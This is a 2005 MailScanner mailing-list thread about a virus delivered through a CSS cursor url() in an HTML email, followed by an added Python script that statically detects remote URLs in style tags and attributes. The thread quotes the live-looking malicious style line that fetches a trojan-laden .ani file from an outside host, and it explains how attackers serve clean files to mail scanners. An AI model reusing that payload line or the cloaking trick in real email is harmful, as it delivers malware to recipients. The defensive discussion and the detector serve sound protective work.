Virus in HTML Email Style Sheet

Julian Field MailScanner at ecs.soton.ac.uk
Tue Mar 29 17:26:09 IST 2005


Rick Cooper wrote:

>>-----Original Message-----
>>From: MailScanner mailing list [mailto:MAILSCANNER at JISCMAIL.AC.UK]On
>>Behalf Of Derek Winkler
>>Sent: Tuesday, March 29, 2005 9:24 AM
>>To: MAILSCANNER at JISCMAIL.AC.UK
>>Subject: Virus in HTML Email Style Sheet
>>
>>
>>Here's the HTML source for a message that had a virus in it...
>>
>>Hey Love<br>I reserved us a place at huoston's tonight.<br>starting to be
>>hungry already, for you!!<br>Bob
>><br><br><br><br>
>><style>* {CURSOR: url("http://banukultepe.sitemynet.com/m89.ani")}</style>
>>
>>When the CURSOR is retrieved it has Trojan.Moo in it according to NAV.
>>
>>MailScanner did not catch this.
>>
>>Should there be a disarm URLs in style sheets setting in MailScanner?
>>
>>Does anyone know of a virus scanner that checks URLs in email as well? I
>>thought Clam was doing this.
>>
>>Thanks,
>>
>>Derek
>>
>>
>>
>>
>
>Clam does, if it's configured with --with-libcurl and the MailFollowURLs
>option is set in the config file.
>To use this feature in the ClamAVModule the bit mask would have to include
>Mail::ClamAV::CL_SCAN_MAILURL() and it currently does not. There are obvious
>potential DOS problems with this, but I guess the question would be do
>enough people want it to warrant Julian adding yet another config option?
>One would have to use it with care because it would certainly increase the
>server load significantly as it would retrieve any file pointed to by any
>url link and then scan it.
>
>
Doing this on any machine other than the final client is pretty
pointless. It's easy to configure Apache to send one file to one
machine, and a different file to other machines. The virus writers get a
GET request from an IP address. Is this an MX host of the domain they
just sent the message to? If so, send an empty file or a safe file. Not
an MX? Then send a virus.

This is the same reason MailScanner rejects messages with external bodies.

How do I detect URLs inside <STYLE>.....</STYLE> tags?

--
Julian Field
www.MailScanner.info
Buy the MailScanner book at www.MailScanner.info/store
Professional Support Services at www.MailScanner.biz
MailScanner thanks transtec Computers for their support

PGP footprint: EE81 D763 3DB0 0BFD E1DC 7222 11F6 5947 1415 B654
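
A static way to find the URLs asked about above, as an added example that is not part of the original post and is not MailScanner code: it parses the HTML, collects `<style>` element content and inline `style=` attributes, and reports `url(...)` and `@import` targets that point off the message, without fetching anything. The function and class names and the `example.invalid` sample are constructed for illustration.

```python
import re
from html.parser import HTMLParser

# CSS hex escapes ("\72" is "r") are decoded first so "u\72l(" still matches.
CSS_ESCAPE = re.compile(r"\\([0-9a-fA-F]{1,6})\s?")
# url(...) with optional quotes, or @import "..." written without url().
CSS_REF = re.compile(
    r"""url\(\s*(['"]?)(?P<u>[^'")]*?)\1\s*\)|@import\s+(['"])(?P<i>[^'"]+)\3""",
    re.IGNORECASE)
# Absolute or protocol-relative targets make the mail client fetch from the network.
REMOTE = re.compile(r"(?:[a-z][a-z0-9+.-]*:)?//", re.IGNORECASE)

class StyleUrlFinder(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.in_style, self.buf, self.hits = False, [], []

    def scan(self, css, where):
        css = CSS_ESCAPE.sub(lambda m: chr(min(int(m.group(1), 16), 0x10FFFF)), css)
        for m in CSS_REF.finditer(css):
            target = (m.group("u") or m.group("i") or "").strip()
            if REMOTE.match(target):
                self.hits.append((where, target))

    def handle_starttag(self, tag, attrs):
        self.in_style = self.in_style or tag == "style"
        for name, value in attrs:
            if name == "style" and value:   # inline style="..." attribute
                self.scan(value, "<%s style=>" % tag)

    def handle_data(self, data):
        if self.in_style:                   # the parser may deliver CSS in pieces
            self.buf.append(data)

    def handle_endtag(self, tag):
        if tag == "style":                  # scan the buffered CSS once complete
            self.scan("".join(self.buf), "<style>")
            self.in_style, self.buf = False, []

def remote_style_urls(html):
    finder = StyleUrlFinder()
    finder.feed(html)
    finder.close()
    finder.handle_endtag("style")           # scan any CSS still sitting in the buffer
    return finder.hits

# Constructed sample modelled on the message above; example.invalid is a placeholder.
SAMPLE = r'''Hey<br><style>* {CURSOR: url("http://example.invalid/m89.ani")}</style>
<p style="background:u\72l(//example.invalid/x.gif)">hi</p>
<b style="background:url(data:image/gif;base64,AAAA)">ok</b>'''
```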
